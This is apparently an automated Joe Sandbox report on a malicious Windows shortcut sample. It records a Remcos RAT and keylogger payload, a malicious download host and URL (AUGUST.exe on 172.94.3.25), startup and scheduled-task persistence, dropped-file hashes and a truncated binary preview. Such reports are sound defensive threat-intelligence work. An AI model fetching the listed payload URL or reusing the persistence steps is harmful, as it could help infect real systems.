                      https://www.datanumen.com/zip-repair/AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.symauth.com/rpa00DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htmDZIPR.exe.17.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.info-zip.org/DZIPR.exe, 00000011.00000002.2343813669.0000000003588000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EB5000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004DEB000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.0000000004982000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004D5D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.vmware.com/0/DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000015.00000003.2438441779.000002061F000000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.infDZIPR.exe.17.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://c0rl.m%LDZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.repairfile.comDZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.symauth.com/cps0(DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://support.datanumen.comDZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.datanumen.com/%https://www.datanumen.com/zip-repair/DZIPR.exe.17.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.datanumen.com/support/DZIPR.exe.17.drfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      172.94.3.25
                      		unknownUnited States
                      		3223VOXILITYGBtrue

                      Private

                      IP
                      127.0.0.1

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1518489
                      Start date and time:2024-09-25 18:39:22 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 25s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:32
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Dlr7HYI6VL.lnk
                      renamed because original name is a hash value
                      Original Sample Name:383bec1808c99dcffafa9f4e03f104a4.lnk
                      Detection:MAL
                      Classification:mal100.troj.expl.evad.winLNK@44/34@0/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 70
                      • Number of non-executed functions: 215
                      Cookbook Comments:
                      • Found application associated with file extension: .lnk

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: Dlr7HYI6VL.lnk

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:40:17API Interceptor86x Sleep call for process: powershell.exe modified
                      12:40:45API Interceptor2x Sleep call for process: svchost.exe modified
                      12:41:05API Interceptor6x Sleep call for process: cmd.exe modified
                      18:40:49AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmp
                      18:40:53Task SchedulerRun new task: lnfast_x64 path: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      18:41:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      172.94.3.25MdkbG2pK4l.lnkGet hashmaliciousRemcosBrowse
                      • lawyerconsult.top/AUGUST.exe
                      55Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                      • 172.94.3.25/AUGUST.exe

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      VOXILITYGBMdkbG2pK4l.lnkGet hashmaliciousRemcosBrowse
                      • 172.94.3.25
                      55Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                      • 172.94.3.25
                      zz91Dcv5Kf.dllGet hashmaliciousRemcosBrowse
                      • 172.94.9.207
                      V9HUU0LCin.dllGet hashmaliciousRemcosBrowse
                      • 172.94.9.207
                      E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                      • 172.94.15.211
                      Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                      • 172.94.15.211
                      af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exeGet hashmaliciousNanocore, RemcosBrowse
                      • 104.243.242.162
                      zczsJahg5p.exeGet hashmaliciousNanocore, Remcos, PureLog StealerBrowse
                      • 104.243.242.164
                      SLL8zVmaGj.elfGet hashmaliciousUnknownBrowse
                      • 185.247.61.190
                      tfEceyjWwA.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                      • 104.243.242.171

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\gpsMdkbG2pK4l.lnkGet hashmaliciousRemcosBrowse
                        epht1Y3TGZ.exeGet hashmaliciousRemcosBrowse
                          55Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                            C:\Users\user\AppData\Local\Temp\qapuwvrMdkbG2pK4l.lnkGet hashmaliciousRemcosBrowse
                              epht1Y3TGZ.exeGet hashmaliciousRemcosBrowse
                                55Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                                  C:\Users\user\AppData\Local\Temp\demhwkMdkbG2pK4l.lnkGet hashmaliciousRemcosBrowse
                                    epht1Y3TGZ.exeGet hashmaliciousRemcosBrowse
                                      55Ka50lb6Z.batGet hashmaliciousRemcosBrowse

                                        Created / dropped Files

                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.7515639318285886
                                        Encrypted:false
                                        SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0p:9JZj5MiKNnNhoxuI
                                        MD5:F1BFBF4F39082D5059F0B7968477B3FE
                                        SHA1:A3BE39F7CEE97C0555F44849CAC867AC09C2E88A
                                        SHA-256:2786A894A0AA0BF044E711ADC8ED7E20623349B41B19E965BB0616027DF68B02
                                        SHA-512:77EC3E804F24605403E883F700C2C32BDC413A2B4370A314B08193D89E72009CDAC0E1995984CEEB45CAAF7AEB0A1FCAD75F3EAE8DEDD42BD2D5F88EE2B1EBE6
                                        Malicious:false
                                        Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:Extensible storage user DataBase, version 0x620, checksum 0xa0cf7431, page size 16384, DirtyShutdown, Windows version 10.0
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.7555560568013207
                                        Encrypted:false
                                        SSDEEP:1536:1SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:1azaSvGJzYj2UlmOlOL
                                        MD5:D1998F10F4CB646E1E69FBC51737E2CE
                                        SHA1:5FE5BAC2C3B7F3B5A2DF251A7D998C9B6361B08F
                                        SHA-256:4A91B8718E7DEC025596902AE03552BCA10BFBA1A2C77320DD19D61DFB808C9B
                                        SHA-512:3E5FB86433FED44CB905218EF08A45905C0222A40E77263C14194021478C94F5385C9AB7D9276CDF5AB9B028F53351C2103D8B25F786A07D6071F6EACC12C565
                                        Malicious:false
                                        Preview:..t1... .......7.......X\...;...{......................0.e......!...{?.-(...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{.....................................-(...|.................Q.l.-(...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.07827707258297226
                                        Encrypted:false
                                        SSDEEP:3:iYe/8sXqfNaAPaU1lZZC/alluxmO+l/SNxOf:iz/8sANDPaU7gmOH
                                        MD5:4406F7BF25502F43065DF14AA62780EF
                                        SHA1:C84A535029CCFC8F24EAC0528FCE18BD344B3F8B
                                        SHA-256:A3A79B86C65F0491C1CD51FE35A0FE974752D8F0B5C7D38BD0E2543AD2ACB65A
                                        SHA-512:710D3B15C8A1CD04258F1FEB699314F337EF56ADF30411F12A123F203FD38D6A4E4EB1F052852009A9B2462E4425DE9E44750A26310EB0A77BB0285383A8884F
                                        Malicious:false
                                        Preview:*(.......................................;...{..-(...|...!...{?..........!...{?..!...{?..g...!...{?.................Q.l.-(...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................

                                        C:\Users\user\AppData\Local\Temp\6e17276

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1234044
                                        Entropy (8bit):7.641700764511553
                                        Encrypted:false
                                        SSDEEP:24576:cJ7RP83QjzweEpWlgBwn0xeRzJdIQlvC3/pSBWuR0H:cxq6weE0lgBVgJdnwPBuR0H
                                        MD5:03A7073785255DCCB5413E58414CEFD0
                                        SHA1:3A50F08F2359A14ACB81E9A8B073FEEE28C0AFAF
                                        SHA-256:A46DD6DCF1408409688F49DA6C036EBDC5A16D1D06C2DA0E2BA9B758B47ABCA4
                                        SHA-512:FC28F9B38DF9E45614DBE955B9F0990079A0E2F5064CC2750CB328DDF68FE0D39D701D4C804FCF24DEE1B5D4650BC0BA83804917F4D76A44534CF9BB4D06DE62
                                        Malicious:false
                                        Preview:i&..k&..k&..j&..k&...&..~&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..OgY..g].OzD..Tf..@}.=Og..Qz.9Rh...D..SU..In..Kz.9Rh..Sy.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)I@..R`..Os./^..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)IJ..G}.#Hz..Hj.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..Oq@..o[.6k`..Iz..R'./rU..Gd..I{.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&....'.D.9.X...j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5w0ugwjb.zhf.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chua5xud.xaa.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exkyhqr3.khy.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_issxs0m2.1x4.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itcxxoq4.eoy.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdnnkvff.gsl.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhkk0vgu.afh.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlvabzwv.nho.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\demhwk

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):500224
                                        Entropy (8bit):6.590620352205087
                                        Encrypted:false
                                        SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                                        MD5:6CA401F82443B673FCA7D7DDB0A05357
                                        SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                                        SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                                        SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: unknown
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: unknown
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 87%
                                        Joe Sandbox View:
                                        • Filename: MdkbG2pK4l.lnk, Detection: malicious, Browse
                                        • Filename: epht1Y3TGZ.exe, Detection: malicious, Browse
                                        • Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\f155ca23

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1234044
                                        Entropy (8bit):7.641698815657688
                                        Encrypted:false
                                        SSDEEP:24576:pJ7RP83QjzweEpWlgBwn0xeRzJdIQlvC3/pSBWuR0H:pxq6weE0lgBVgJdnwPBuR0H
                                        MD5:098D0C011885D97B2F87FA67628DF744
                                        SHA1:7FB21158D3E2E05C55300E6661B07D0926EDAA30
                                        SHA-256:77C388ADAA608B74033BBF5C86090AB8293056DE2B6FFFDCBCE281BA499C6260
                                        SHA-512:1C80EED7E1CBBEEA9EBA34916D9E2EF3946774753FC4124CEA43284E9BE46DBAA6EA32806263F1888318FD304089EFA59BA9386034F23995CC3E6782016E00AF
                                        Malicious:false
